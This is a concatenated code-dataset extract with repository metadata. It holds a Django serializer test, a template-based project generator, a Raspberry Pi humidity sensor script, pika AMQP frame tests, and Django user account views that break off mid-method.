from aluraflix.serializers import ProgramaSerializer
class ProgramaSerializerTestCase(TestCase):
    """Tests for ProgramaSerializer: which fields it exposes and their content."""
    def setUp(self):
        # Build an unsaved Programa instance and wrap it in the serializer.
        self.programa = Programa(
            titulo = 'Procurando ninguém em latim',
            data_lancamento = '2003-07-04',
            tipo = 'F',
            likes = 2340,
            dislikes = 40
        )
        self.serializer = ProgramaSerializer(instance=self.programa)
    def test_verifica_campos_serializados(self):
        """Check which fields are serialized (note: 'dislikes' is excluded)."""
        data = self.serializer.data
        self.assertEqual(set(data.keys()), set(['titulo', 'tipo', 'data_lancamento', 'likes']))
    def test_verifica_conteudo_dos_campos_serializados(self):
        """Check the content of each serialized field against the model instance."""
        data = self.serializer.data
        self.assertEqual(data['titulo'], self.programa.titulo)
        self.assertEqual(data['data_lancamento'], self.programa.data_lancamento)
        self.assertEqual(data['tipo'], self.programa.tipo)
        self.assertEqual(data['likes'], self.programa.likes)
| 39.166667
| 96
| 0.667234
| 1,048
| 0.889643
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.20798
|
366b6bc762ff4618c8e2b630d09921664231bc91
| 53
|
py
|
Python
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 31
|
2017-09-27T14:54:39.000Z
|
2021-05-26T14:03:44.000Z
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 11
|
2018-03-11T05:28:14.000Z
|
2022-03-11T23:19:36.000Z
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 41
|
2017-10-21T04:45:56.000Z
|
2021-07-16T14:12:33.000Z
|
def add(m, n):
    """Return the sum of m and n."""
    # Fix: the docstring promises addition but the body subtracted.
    # (This file lives in a "unittest_sample_ng" demo directory, so the
    # defect may have been intentional teaching material — flagging anyway.)
    return m + n
| 13.25
| 20
| 0.490566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 32
| 0.463768
|
366bcb9133a5c3e67a13ed8806476e7eebec5689
| 16,720
|
py
|
Python
|
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
gen
~~~~~~~~~~~~~~
Command gen.
:copyright: (c) 2021 by weiminfeng.
:date: 2021/9/1
"""
import argparse
import importlib.util
import json
import logging
import os
import re
import shutil
import sys
from typing import List
import inflection
from flask import request
from jinja2 import Environment, TemplateSyntaxError, FileSystemLoader
from werkzeug.urls import url_quote, url_encode
from pyseed import registered_models
from pyseed.error import TemplateError
from pyseed.utils import work_in
logger = logging.getLogger(__name__)  # module-level logger, standard convention
def _prepare_jinja2_env():
    """ Prepare env for rendering jinja2 templates.

    Returns an Environment preloaded with the custom filters (split, items,
    keys, quote, basename, urlquote) and globals (update_query, new_model)
    that the generated templates rely on.
    """
    #
    # For more env setting, please refer to https://jinja.palletsprojects.com/en/3.0.x/api/#jinja2.Environment
    # trim_blocks=True, the first newline after a block is removed (block, not variable tag!)
    # lstrip_blocks=True, leading spaces and tabs are stripped from the start of a line to a block
    # keep_trailing_newline=True, Preserve the trailing newline when rendering templates.
    #
    env = Environment(trim_blocks=True, lstrip_blocks=True, keep_trailing_newline=True)
    # --- Custom filters ---
    def split(value, separator):
        """ Split a string. """
        return value.split(separator)
    def items(value):
        """ Return items of a dict. """
        return value.items()
    def keys(value):
        """ Return keys of a dict. """
        return value.keys()
    def quote(value):
        """ Add single quote to value if it is str, else return its __str__. """
        if isinstance(value, str):
            return '\'' + value + '\''
        else:
            return str(value)
    def basename(value):
        """ Return file name from a path. """
        return os.path.basename(value)
    def urlquote(value, charset='utf-8'):
        """ Url Quote. """
        return url_quote(value, charset)
    env.filters['split'] = split
    env.filters['items'] = items
    env.filters['keys'] = keys
    env.filters['quote'] = quote
    env.filters['basename'] = basename
    env.filters['urlquote'] = urlquote
    # --- Custom globals (usable anywhere in a template) ---
    def update_query(**new_values):
        """ Update query. """
        # Merge new_values into the current request's query string.
        args = request.args.copy()
        for key, value in new_values.items():
            args[key] = value
        return '{}?{}'.format(request.path, url_encode(args))
    def new_model(class_name):
        """ New a model by class name. """
        # NOTE(review): looks up class_name in THIS module's globals(); that
        # only resolves if model classes are imported into this namespace,
        # which the visible imports do not show — verify before relying on it.
        klass = globals()[class_name]
        return klass()
    env.globals['update_query'] = update_query
    env.globals['new_model'] = new_model
    #
    return env
def _gen(models_dir: str, seeds_dir: str, out_dir: str, template_names: List[str]):
    """ Generate project files into out_dir from registered models plus seed
    definitions, using the named template folders found in the current
    working directory.

    Returns False on a precondition failure (missing folders/templates);
    otherwise returns None after rendering.
    """
    logger.info(f'gen {models_dir} and {seeds_dir} to {out_dir}, using {template_names}')
    if not os.path.exists(models_dir):
        logger.error('No models folder')
        return False
    if not os.path.exists(seeds_dir):
        logger.error('No seeds folder')
        return False
    if not os.path.exists(out_dir):
        os.mkdir(out_dir)
    #
    # find templates from current folder
    # TODO: Download template to current working folder
    #
    working_folder = os.getcwd()
    logger.info(f'Working folder is {working_folder}')
    templates = []
    for g in os.listdir(working_folder):
        p = os.path.join(working_folder, g)
        if os.path.isdir(p) and g in template_names:
            templates.append(g)
    #
    if not templates:
        logger.error(f'Can not find any available templates by {template_names}')
        return False
    #
    # Import models package
    # 1. Find all the models definition in models package, please import all models in __init__.py
    #
    module_name = os.path.basename(models_dir)
    module_spec = importlib.util.spec_from_file_location(module_name, os.path.join(models_dir, '__init__.py'))
    module = importlib.util.module_from_spec(module_spec)
    sys.modules[module_name] = module
    module_spec.loader.exec_module(module)
    #
    # Load registered model schemas
    #
    models = {}
    for m in registered_models:
        models[m.__name__] = {'schema': m.schema(), **_generate_names(m.__name__)}
    #
    logger.info(f'Found {len(models)} registered models: {list(models.keys())}')
    #
    # Create context using contents in seeds_dir
    # 1. Files in seeds_dir root folder are used as layouts
    # 2. Only contains one level sub folders and each folder will be generated to a blueprint
    # 3. Files in each blueprint folder will be generated to views
    # 4. Each view file contains var lines, i.e. !key=value, and seed grids
    context = {
        'models': models, # {name: {name, schema}}}
        'layouts': [], # [layout]
        'blueprints': [], # [blueprint]
        'seeds': [],
    }
    logger.info(f'Seeds:')
    for d in os.listdir(seeds_dir): # Blueprints
        p = os.path.join(seeds_dir, d)
        if os.path.isdir(p):
            logger.info(f'{d}/')
            blueprint = {'views': [], **_generate_names(d)}
            models_by_name = {}
            for dd in os.listdir(p): # Views
                view = {'blueprint': blueprint, 'rows': [], 'seeds': [], 'params': {}, **_generate_names(dd)}
                pp = os.path.join(p, dd)
                logger.info(f' {dd}')
                with open(pp) as f: # Seeds defined in views
                    for line in f:
                        line = line.strip()
                        if not line:
                            continue
                        #
                        # Variable line: !key=value
                        key_value_found = re.match('^!([a-zA-Z_]+)=(.+)$', line)
                        if key_value_found:
                            key, value = key_value_found.groups()
                            #
                            # NOTES:
                            # 1. Variables name should be in snake format, i.e, two_words
                            # 2. Variables can be accessed in templates by view.params.field_name
                            #
                            value = _parse_varible_value(key, value)
                            view['params'][key] = value
                        else:
                            # Grid line: comma-separated seeds, '|' for nesting
                            row = {'columns': []}
                            if '|' in line: # Nested column, e.g, a,b|c,d
                                for c in line.split('|'):
                                    column = []
                                    for cc in c.split(','):
                                        cc = cc.strip()
                                        seed = _parse_seed(cc, models)
                                        if 'model' in seed:
                                            models_by_name[seed['model']['name']] = seed['model']
                                            view['seeds'].append(seed)
                                            context['seeds'].append(seed)
                                        #
                                        column.append(seed)
                                    #
                                    row['columns'].append(column)
                            else: # Single level column, e.g, a,b
                                for c in line.split(','):
                                    c = c.strip()
                                    seed = _parse_seed(c, models)
                                    if 'model' in seed:
                                        models_by_name[seed['model']['name']] = seed['model']
                                        view['seeds'].append(seed)
                                        context['seeds'].append(seed)
                                    #
                                    row['columns'].append(seed)
                            #
                            logger.info(f' {line}')
                            view['rows'].append(row)
                #
                blueprint['views'].append(view)
            blueprint['models'] = models_by_name.values()
            #
            context['blueprints'].append(blueprint)
        else:
            logger.info(f'{d}')
            context['layouts'].append(d)
    #
    env = _prepare_jinja2_env()
    #
    # Iterate each template
    #
    for template in templates:
        #
        # Prepare paths
        #
        tempate_path = template
        output_path = out_dir
        # NOTE(review): out_dir was already created above; this re-check is
        # redundant but harmless.
        if not os.path.exists(output_path):
            os.mkdir(output_path)
        logger.info(f'Generate template {template}: {tempate_path} -> {output_path}')
        #
        # Use depth-first to copy templates to output path, converting all the names and render in the meanwhile
        #
        for d in os.listdir(tempate_path):
            _recursive_render(tempate_path, output_path, d, context, env)
def _generate_names(name):
    """ Build the full set of naming variants used by templates for *name*. """
    sanitized = name.replace('.', '-')  # e.g, plan.members-form -> plan-members-form
    snake = inflection.underscore(sanitized)
    return {
        'name': name,                                                           # => SampleModel
        'name_lower': name.lower(),                                             # => samplemodel
        'name_kebab': inflection.dasherize(snake),                              # => sample-model
        'name_camel': inflection.camelize(sanitized, uppercase_first_letter=False),  # => sampleModel
        'name_snake': snake,                                                    # => sample_model
        'name_snake_plural': inflection.tableize(sanitized),                    # => sample_models
        'name_title': inflection.titleize(sanitized),                           # => Sample Model
    }
def _parse_varible_value(key, value):
""" Parse value accordig to the key. """
key = key.lower()
value = value.strip()
if key.startswith('has_') or key.startswith('is_'):
if value.lower() in ['1', 'true', 'yes']:
value = True
else:
value = False
elif value.startswith('[') or value.startswith('{'):
try:
value = json.loads(value) # Need to use double quotes for string values or key names
except ValueError as e:
logger.warning(f'Can not parse list or dict varible {key}={value}, use as string directly')
#
return value
def _parse_seed(column, models):
    """ Parse one seed column spec of the form ``model[.sub]-action[?params]``,
    e.g, post-query, post-read, user-form?is_horizontal=true.

    Returns a dict with naming variants plus, when the model is known,
    its schema entry, optional sub-model name, action and parsed params.
    """
    # Optional query-string style params after '?'.
    params = {}
    if '?' in column:
        column, query = column.split('?')
        for pair in query.split('&'):
            k, v = pair.split('=')
            params[k] = _parse_varible_value(k, v)
    # model-action, with an optional one-level sub model: model.sub-action
    tokens = column.split('-')
    model_name, sub = tokens[0], None
    if '.' in model_name:
        model_name, sub = model_name.split('.')
    # Case-insensitive lookup of the model by name.
    found = next((m for n, m in models.items() if n.lower() == model_name.lower()), None)
    if found:
        return {'model': found, 'sub': sub, 'action': tokens[-1], 'params': params, **_generate_names(column)}
    return {'params': params, **_generate_names(column)}
def _recursive_render(t_base, o_base, name, context, env):
    """ Copy folder or file from template folder to output folder, handling
    names that carry list/variable syntax, and render ``*.jinja2`` files.

    Supported Syntax:
      {{#blueprints}}   - expand once per blueprint
      {{blueprint}}     - current blueprint's name
      {{#views}}        - expand once per view of the current blueprint
      {{view}}          - current view's name
      {{#seeds}}        - expand once per seed
      {{seed}}          - current seed's name
    """
    t_path = os.path.join(t_base, name)
    logger.debug(f'template {t_path}')
    t_name = ''.join(name.split())  # Remove all the whitespace chars from name
    out_names = []
    out_key, out_values = None, []
    #
    # Check list syntax, i.e, {{#name}}
    # This syntax iterates over every item of the list; nothing is generated
    # for an empty list.
    #
    match_list = re.search('(\\{\\{#[a-zA-Z._]+\\}\\})', t_name)
    if match_list:
        syntax = match_list.group(1)  # => {{#views}}
        key = syntax[3:-2]  # => views
        if key == 'blueprints':
            out_key = '__blueprint'
            out_values = context['blueprints']
            out_names = [t_name.replace(syntax, v['name']) for v in out_values]
        elif key == 'views':
            out_key = '__view'
            out_values = context['__blueprint']['views']
            out_names = [t_name.replace(syntax, v['name']) for v in out_values]
        elif key == 'seeds':
            out_key = '__seed'
            out_values = context['seeds']
            out_names = [t_name.replace(syntax, v['name']) for v in out_values]
        else:
            raise TemplateError(f'Unsupported list syntax: {syntax}')
    else:
        #
        # Check variable syntax, i.e, {{name}}
        # This syntax substitutes the value of the variable.
        #
        match_variable = re.search('(\\{\\{[a-zA-Z._]+\\}\\})', t_name)
        if match_variable:
            # BUGFIX: was `match_list.group(1)` — match_list is always None in
            # this branch, so any {{var}} name raised AttributeError.
            syntax = match_variable.group(1)
            key = syntax[2:-2]
            if key in ['blueprint', 'view', 'seed']:
                # BUGFIX: was `out_key == f'__{key}'` (a no-op comparison),
                # leaving out_key None so context[out_key] failed below.
                out_key = f'__{key}'
                out_values = [context[f'__{key}']]
                out_names = [t_name.replace(syntax, v['name']) for v in out_values]
            else:
                out_names = [t_name]
        else:
            out_names = [t_name]
    #
    # Copy & Render
    #
    if os.path.isdir(t_path):
        for i, o_name in enumerate(out_names):
            o_path = os.path.join(o_base, o_name)
            logger.debug(f'output {o_path}')
            if not os.path.exists(o_path):
                os.mkdir(o_path)
            # Make the current list item visible to sub folders and files.
            if out_values:
                context[out_key] = out_values[i]
            # Copy the whole folder, use sorted() to make sure files starting with _ can be copied firstly
            for d in sorted(os.listdir(t_path)):
                _recursive_render(t_path, o_path, d, context, env)
            # Remove the files starting with #, which have been used for rendering
            for f in os.listdir(o_path):
                fp = os.path.join(o_path, f)
                if os.path.isfile(fp) and f.startswith('#'):
                    logger.debug(f'delete {f}')
                    os.remove(fp)
            logger.debug(f'done {o_path}')
    #
    else:
        for o_name in out_names:
            o_path = os.path.join(o_base, o_name)
            logger.debug(f'copy {o_name}')
            shutil.copyfile(t_path, o_path)
            shutil.copymode(t_path, o_path)
        #
        # Render file
        # 1. Change working folder to ., so that jinja2 works ok
        # 2. Files with name starts with # will be included for rendering, so NO need to render
        # 3. Files with name ends with jinja2 will be rendered
        #
        o_base = os.path.abspath(o_base)
        with work_in(o_base):
            # Set jinja2's search path to the current output folder.
            env.loader = FileSystemLoader('.')
            o_context = {k: v for k, v in context.items() if not k.startswith('__')}
            #
            for i, o_name in enumerate(out_names):
                if o_name.startswith('#') or not o_name.endswith('.jinja2'):
                    continue
                #
                o_file = o_name.replace('.jinja2', '')
                logger.debug(f'render {o_file}')
                # Remove __ so that the object can be accessed in the template
                if out_values:
                    o_context[out_key[2:]] = out_values[i]
                #
                try:
                    tmpl = env.get_template(o_name)
                except TemplateSyntaxError as exception:
                    exception.translated = False
                    raise
                rendered = tmpl.render(**o_context)
                #
                with open(o_file, 'w', encoding='utf-8') as f:
                    f.write(rendered)
                # Remove the template file once its output has been written.
                os.remove(o_name)
def main(args: List[str]) -> bool:
    """Entry point for `pyseed gen`: parse CLI arguments and run generation.

    Args:
        args: Command-line arguments (without the program name).

    Returns:
        Whatever `_gen` reports (True on success).
    """
    parser = argparse.ArgumentParser(prog="pyseed gen")
    # The three folder options share the same shape: optional single value
    # with a default. (flag, metavar, default, help) per option.
    folder_options = (
        ("-m", 'models', './models',
         "Specify the models folder, default value is ./models"),
        ("-s", 'seeds', './seeds',
         "Specify the seeds folder, default value is ./seeds"),
        ("-o", 'output', './grows',
         "Specify the generation output folder, default value is ./grows"),
    )
    for flag, meta, default, help_text in folder_options:
        parser.add_argument(flag, nargs='?', metavar=meta, default=default, help=help_text)
    parser.add_argument(
        "-t",
        nargs='+',
        metavar='templates',
        help="Specify the templates",
    )
    ns = parser.parse_args(args)
    return _gen(ns.m, ns.s, ns.o, ns.t)
| 37.321429
| 112
| 0.536124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,137
| 0.307237
|
366e02860b9652ab88acf006189e3756c87e9843
| 575
|
py
|
Python
|
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | 1
|
2015-12-23T04:27:16.000Z
|
2015-12-23T04:27:16.000Z
|
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | null | null | null |
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | null | null | null |
# this example came from http://www.raspberrypi.org/phpBB3/viewtopic.php?f=32&t=29454&sid=4543fbd8f48478644e608d741309c12b&start=25
import smbus
import time
# Open I2C bus 1 (the bus exposed on the Raspberry Pi GPIO header).
b = smbus.SMBus(1)
d = []
# Sensor I2C address. The bit layout and scaling below match a Honeywell
# HumidIcon HIH61xx humidity/temperature sensor -- TODO confirm exact model.
addr = 0x27
# Address-only write: triggers a measurement request on this kind of sensor.
b.write_quick(addr)
# Give the sensor time to finish the conversion before reading
# (50 ms is presumably enough -- verify against the sensor datasheet).
time.sleep(0.05)
# Read the 4-byte measurement: [status+hum_hi, hum_lo, temp_hi, temp_lo].
d = b.read_i2c_block_data(addr, 0,4)
# Top two bits of byte 0 carry the status flags.
status = (d[0] & 0xc0) >> 6
# Remaining 14 bits of bytes 0-1: raw humidity, scaled to 0-100 %RH.
humidity = (((d[0] & 0x3f) << 8) + d[1])*100/16383
# Bytes 2-3 (14 bits, right-aligned after dropping 2 LSBs): raw temperature
# mapped onto a 165-degree span starting at -40 C.
tempC = ((d[2] << 6) + ((d[3] & 0xfc) >> 2))*165/16383 - 40
tempF = tempC*9/5 + 32
# NOTE: Python 2 print statements -- this script will not run under Python 3.
print "Data: ", "%02x "*len(d)%tuple(d)
print "Status: ", status
print "Humidity: ", humidity, "%"
print "Temperature:", tempF, "F"
| 31.944444
| 131
| 0.634783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 200
| 0.347826
|
366e485c9bc0322e636a5736840956b42775c986
| 4,493
|
py
|
Python
|
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | 1
|
2018-09-02T22:28:56.000Z
|
2018-09-02T22:28:56.000Z
|
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | null | null | null |
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | null | null | null |
"""
Tests for pika.frame
"""
try:
import unittest2 as unittest
except ImportError:
import unittest
from pika import exceptions
from pika import frame
from pika import spec
class FrameTests(unittest.TestCase):
    """Tests for marshalling and decoding AMQP wire-format frames (pika.frame).

    The constants below are pre-marshalled frames (Python 2 ``str`` byte
    strings) used both as expected marshalling output and as decode input.
    """

    # Basic.Ack method frame on channel 1 (delivery tag 100).
    BASIC_ACK = ('\x01\x00\x01\x00\x00\x00\r\x00<\x00P\x00\x00\x00\x00\x00\x00'
                 '\x00d\x00\xce')
    # Body frame on channel 1 carrying BODY_FRAME_VALUE.
    BODY_FRAME = '\x03\x00\x01\x00\x00\x00\x14I like it that sound\xce'
    BODY_FRAME_VALUE = 'I like it that sound'
    # Content header frame on channel 1 (body size 100, delivery_mode=2).
    CONTENT_HEADER = ('\x02\x00\x01\x00\x00\x00\x0f\x00<\x00\x00\x00'
                      '\x00\x00\x00\x00\x00\x00d\x10\x00\x02\xce')
    HEARTBEAT = '\x08\x00\x00\x00\x00\x00\x00\xce'
    PROTOCOL_HEADER = 'AMQP\x00\x00\t\x01'

    # --- marshalling ---

    def frame_marshal_not_implemented_test(self):
        # The abstract base Frame cannot be marshalled directly.
        frame_obj = frame.Frame(0x000A000B, 1)
        self.assertRaises(NotImplementedError, frame_obj.marshal)

    def frame_underscore_marshal_test(self):
        basic_ack = frame.Method(1, spec.Basic.Ack(100))
        self.assertEqual(basic_ack.marshal(), self.BASIC_ACK)

    def headers_marshal_test(self):
        header = frame.Header(1, 100,
                              spec.BasicProperties(delivery_mode=2))
        self.assertEqual(header.marshal(), self.CONTENT_HEADER)

    def body_marshal_test(self):
        body = frame.Body(1, 'I like it that sound')
        self.assertEqual(body.marshal(), self.BODY_FRAME)

    def heartbeat_marshal_test(self):
        heartbeat = frame.Heartbeat()
        self.assertEqual(heartbeat.marshal(), self.HEARTBEAT)

    def protocol_header_marshal_test(self):
        protocol_header = frame.ProtocolHeader()
        self.assertEqual(protocol_header.marshal(), self.PROTOCOL_HEADER)

    # --- decoding ---
    # decode_frame returns (bytes_consumed, frame_object); (0, None) signals
    # "not enough data / unrecognized input".

    def decode_protocol_header_instance_test(self):
        self.assertIsInstance(frame.decode_frame(self.PROTOCOL_HEADER)[1],
                              frame.ProtocolHeader)

    def decode_protocol_header_bytes_test(self):
        self.assertEqual(frame.decode_frame(self.PROTOCOL_HEADER)[0], 8)

    def decode_method_frame_instance_test(self):
        self.assertIsInstance(frame.decode_frame(self.BASIC_ACK)[1],
                              frame.Method)

    def decode_protocol_header_failure_test(self):
        # A truncated/invalid protocol header is simply not consumed.
        self.assertEqual(frame.decode_frame('AMQPa'), (0, None))

    def decode_method_frame_bytes_test(self):
        self.assertEqual(frame.decode_frame(self.BASIC_ACK)[0], 21)

    def decode_method_frame_method_test(self):
        self.assertIsInstance(frame.decode_frame(self.BASIC_ACK)[1].method,
                              spec.Basic.Ack)

    def decode_header_frame_instance_test(self):
        self.assertIsInstance(frame.decode_frame(self.CONTENT_HEADER)[1],
                              frame.Header)

    def decode_header_frame_bytes_test(self):
        self.assertEqual(frame.decode_frame(self.CONTENT_HEADER)[0], 23)

    def decode_header_frame_properties_test(self):
        frame_value = frame.decode_frame(self.CONTENT_HEADER)[1]
        self.assertIsInstance(frame_value.properties, spec.BasicProperties)

    def decode_frame_decoding_failure_test(self):
        self.assertEqual(frame.decode_frame('\x01\x00\x01\x00\x00\xce'),
                         (0, None))

    def decode_frame_decoding_no_end_byte_test(self):
        self.assertEqual(frame.decode_frame(self.BASIC_ACK[:-1]), (0, None))

    def decode_frame_decoding_wrong_end_byte_test(self):
        # Wrong terminator byte is a hard error, not just "incomplete".
        self.assertRaises(exceptions.InvalidFrameError,
                          frame.decode_frame,
                          self.BASIC_ACK[:-1] + 'A')

    def decode_body_frame_instance_test(self):
        self.assertIsInstance(frame.decode_frame(self.BODY_FRAME)[1],
                              frame.Body)

    def decode_body_frame_fragment_test(self):
        self.assertEqual(frame.decode_frame(self.BODY_FRAME)[1].fragment,
                         self.BODY_FRAME_VALUE)

    def decode_body_frame_fragment_consumed_bytes_test(self):
        self.assertEqual(frame.decode_frame(self.BODY_FRAME)[0], 28)

    def decode_heartbeat_frame_test(self):
        self.assertIsInstance(frame.decode_frame(self.HEARTBEAT)[1],
                              frame.Heartbeat)

    def decode_heartbeat_frame_bytes_consumed_test(self):
        self.assertEqual(frame.decode_frame(self.HEARTBEAT)[0], 8)

    def decode_frame_invalid_frame_type_test(self):
        # 0x09 is not a valid frame type.
        self.assertRaises(exceptions.InvalidFrameError,
                          frame.decode_frame,
                          '\x09\x00\x00\x00\x00\x00\x00\xce')
| 38.401709
| 79
| 0.672157
| 4,308
| 0.958825
| 0
| 0
| 0
| 0
| 0
| 0
| 418
| 0.093034
|
366eb4dab94bf0dd50fb14aff2db308e9c7cde9d
| 15,266
|
py
|
Python
|
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | null | null | null |
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | null | null | null |
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | 2
|
2021-05-20T10:43:17.000Z
|
2021-06-09T08:12:24.000Z
|
import logging
from datetime import datetime, timedelta
import requests
from core.utils.customClasses import UserFilter
from core.utils.default_responses import (api_accepted_202,
api_bad_request_400,
api_block_by_policy_451,
api_created_201,
api_payment_required_402)
from core.utils.func import REF_PERCANTAGE, create_ref_link
from django.contrib.auth import authenticate
from django.shortcuts import get_object_or_404
from rest_framework import generics, permissions
from rest_framework.authtoken.models import Token
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import UpdateModelMixin
from rest_framework.response import Response
from rest_framework.views import APIView
from apps.blog.models import PostAction, PostBought
from apps.blog.serializers import PostGetShortSerializers
from .models import *
from .serializers import *
class UserActivationView(APIView):
def get(self, request, uid, token):
protocol = 'https://' if request.is_secure() else 'http://'
web_url = protocol + request.get_host()
post_url = web_url + "/auth/users/activate/"
post_data = {'uid': uid, 'token': token}
result = requests.post(post_url, data=post_data)
content = result.text
return Response(content)
class UserMeRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserMeSerializer
def get_object(self):
return self.request.user
class UserRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserOwnProfileGetSerializer
def get_object(self):
return self.request.user
class UserSearchRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserShortRetrieveSeriliazer
filterset_class = UserFilter
class UserProfileRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserGetSerializer
def retrieve(self, request, username):
user = User.objects.get(username=username)
req_user = request.user
data_compare = request.GET.get('datetime', 0)
limit = request.GET.get('limit', 50)
offset = request.GET.get('offset', 0)
results = []
sub_check = True if Subscription.objects.filter(
target=user, source=req_user, end_date__gte=datetime.now()).exists() else False
sub_dict = {
'subscribed': sub_check
}
if data_compare == 0:
for post in user.user_post.filter(archived=False).order_by('-publication_date'):
post_data = PostGetShortSerializers(
instance=post, context={'request': request}).data
res_dict = {}
res_dict['post'] = post_data
if post.access_level == 1:
res_dict['post']['payed'] = (
True if PostBought.objects.filter(
post=post, user=user).exists() else False
)
else:
res_dict['post']['payed'] = sub_check
post_action_queryset = PostAction.objects.filter(
post=post, user=request.user)
if post_action_queryset.exists():
for action in post_action_queryset:
if action.like:
res_dict['post']['liked'] = True
res_dict['post']['like_id'] = action.pk
break
else:
res_dict['post']['liked'] = False
res_dict['post']['like_id'] = None
else:
res_dict['post']['liked'] = False
res_dict['post']['like_id'] = None
if request.user in post.favourites.all():
res_dict['post']['favourite'] = True
else:
res_dict['post']['favourite'] = False
results.append(res_dict)
return api_accepted_202({
**self.serializer_class(instance=user, context={'request': request}).data,
**{'posts': results[offset:limit+offset]},
**sub_dict
})
def get_serializer_context(self):
return {'request': self.request}
class UserCardListAPI(generics.ListAPIView):
serializer_class = CardGetSerializer
def get_queryset(self):
user = self.request.user
return Card.objects.filter(
user=user
)
class UserBlockedListAPI(generics.ListAPIView):
serializer_class = UserShortRetrieveSeriliazer
def get_queryset(self):
user = self.request.user
return user.blocked_users.all()
class UserSettingsRetrieveAPI(generics.RetrieveAPIView):
serializer_class = SettingsSerializer
queryset = User.objects.all()
def get_object(self):
return self.request.user
class UserLoginAPI(generics.GenericAPIView):
permission_classes = permissions.AllowAny,
serializer_class = UserCreationSerializer
def post(self, request):
email = request.data['email']
password = request.data['password']
user = authenticate(username=email, password=password)
if user is not None:
token, _ = Token.objects.get_or_create(user=user)
return api_created_201(
{
"auth_token": str(token)
}
)
else:
return api_bad_request_400(
{
"non_field_errors": [
"Невозможно войти с предоставленными учетными данными."
]
}
)
class UserCreateAPI(generics.GenericAPIView):
    """Register a new user (optionally linked to a referrer) and return a token.

    Expects ``email``, ``username``, ``password`` and an optional ``referrer``
    (pk) in the request payload. Any failure is reported as HTTP 451 with
    ``{"info": "already exists"}``.
    """
    permission_classes = permissions.AllowAny,
    serializer_class = UserCreationSerializer

    def post(self, request):
        try:
            if request.data.get('referrer'):
                ref_user = User.objects.get(pk=request.data['referrer'])
            else:
                ref_user = None
            username = request.data['username']
            user, created = User.objects.get_or_create(
                email=request.data['email'],
                username=username,
                ref_link=create_ref_link(username),
                referrer=ref_user
            )
            # Explicit raise instead of `assert` (asserts vanish under -O);
            # still handled by the broad except below, same outward behavior.
            if not created:
                raise ValueError("Already exists")
            user.set_password(request.data['password'])
            # Bug fix: the original unconditionally ran
            # `ref_user.repheral_users.add(user)`, which raised AttributeError
            # whenever no referrer was supplied, making every plain
            # registration fail with "already exists". Only track the
            # referral when a referrer actually exists. (The earlier no-arg
            # `.add()` call was a no-op and has been removed.)
            if ref_user is not None:
                ref_user.repheral_users.add(user)
            user.save()
            token, _ = Token.objects.get_or_create(user=user)
            return api_created_201(
                {
                    "auth_token": str(token)
                }
            )
        except Exception as e:
            logging.error(e)
            return api_block_by_policy_451({"info": "already exists"})
class UserAPI(generics.DestroyAPIView):
queryset = User.objects.all()
serializer_class = UserCreationSerializer
def get_object(self):
return self.request.user
class UserPartialUpdateAPI(GenericAPIView, UpdateModelMixin):
queryset = User.objects.all()
serializer_class = UserPartialSerializer
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class CreateSubscriptioAPI(generics.CreateAPIView):
queryset = User.objects.all()
serializer_class = SubscriptionCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
try:
serializer.is_valid(raise_exception=True)
except AssertionError:
return api_block_by_policy_451({"status": "not enought credits"})
self.perform_create(serializer)
return Response(serializer.data)
def get_serializer_context(self):
return {'request': self.request}
class UserSubscription(GenericAPIView):
    """Subscribe ``request.user`` to the user with primary key ``pk``.

    On success (202) the target is credited with the subscription price (and
    the target's referrer gets a ``REF_PERCANTAGE`` share); otherwise a 402
    response reports the missing credit amount.
    """
    queryset = User.objects.all()
    serializer_class = SubscriptionCreateSerializer

    def post(self, request, pk):
        user = request.user
